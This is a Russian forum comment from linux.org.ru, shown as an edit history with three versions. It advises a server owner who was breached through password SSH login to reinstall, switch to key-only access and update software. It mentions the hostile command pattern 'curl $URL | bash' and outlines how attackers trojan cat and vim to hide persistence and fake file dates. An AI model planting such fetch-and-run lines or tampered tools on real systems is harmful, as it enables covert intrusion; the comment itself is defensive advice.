LINUX.ORG.RU

История изменений

Исправление CrX, (текущая версия) :

Мы входим по паролю

Это одна из многих ошибок, совокупность которых привели к этой ситуации.

Если уже поимели, то тут надо всё с нуля переустанавливать. Ты не знаешь и не узнаешь, какие файлы были изменены. Замести следы и даже даты изменения старые поставить — это легко. А можно даже всякие cat и vim (условно, всё, что есть из подобного в системе) изменить так, что при попытки открытия скрипта, ты видишь его без одной строчки, которая делает условный curl $URL | bash, а при сохранении она снова туда добавляется.

«Всё подчистить» из работающей системы, если поимели грамотно, не выйдет. А если пытаться, то всё учесть, будет по трудозатратам на порядки сложнее, чем заново развернуть.

В новой итерации настройте таки доступ исключительно по ключам, доступ по паролю отключив.

Естественно, если вдруг там давно ничего не обновлялось, то в новой итерации ставьте обновлённое ядро, php, git, и что там ещё у вас крутится, где пофикшены дырки, через которые, возможно, и удалось изначально получить доступ и/или поднять привилегии.

Исправление CrX, :

Мы входим по паролю

Это одна из многих ошибок, совокупность которых привели к этой ситуации.

Если уже поимели, то тут надо всё с нуля переустанавливать. Ты не знаешь и не узнаешь, какие файлы были изменены. Замести следы и даже даты изменения старые поставить — это легко. А можно даже всякие cat и vim (условно, всё, что есть из подобного в системе) изменить так, что при попытки открытия скрипта, ты видишь его без одной строчки, которая делает условный curl $URL | bash, а при сохранении она снова туда добавляется.

«Всё подчистить» из работающей системы, если поимели грамотно, не выйдет. А если пытаться, то всё учесть, будет по трудозатратам на порядки сложнее, чем заново развернуть.

В новой итерации настройте таки доступ исключительно по ключам, доступ по паролю отключив.

Исходная версия CrX, :

Мы входим по паролю

Это одна из многих ошибок, совокупность которых привели к этой ситуации.

Если уже поимели, то тут надо всё с нуля переустанавливать. Ты не знаешь и не узнаешь, какие файлы были изменены. Замести следы и даже даты изменения старые поставить — это легко. А можно даже всякие cat и vim (условно, всё, что есть из подобного в системе) изменить так, что при попытки открытия скрипта, ты видишь его без одной строчки, которая делает условный curl $URL | bash, а при сохранении она снова туда добавляется.

«Всё подчистить» из работающей системы, если поимели грамотно, не выйдет. А если пытаться, то всё учесть, будет по трудозатратам на порядки сложнее, чем заново развернуть.